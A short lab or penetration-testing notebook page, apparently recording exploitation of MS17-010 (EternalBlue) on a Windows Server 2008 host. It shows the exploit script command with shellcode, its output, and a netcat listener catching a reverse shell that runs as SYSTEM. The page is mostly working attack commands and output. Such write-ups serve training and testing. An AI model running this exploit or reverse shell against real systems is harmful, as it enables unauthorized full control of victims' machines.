3 ms17-010

Using https://root4loot.com/post/eternalblue_manual_exploit/ as no named pipes found by checker.py

$ python MS17-010/eternalblue_exploit7.py 192.168.129.40 sc_x86.bin
shellcode size: 962
numGroomConn: 13
Target OS: Windows Server (R) 2008 Standard 6001 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done

$ rlwrap nc -lvnp 9000
listening on [any] 9000 ...
connect to [192.168.49.129] from (UNKNOWN) [192.168.129.40] 49159
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> whoami
nt authority\system
PreviousINTERNALNext2 :139 :445 smb

Last updated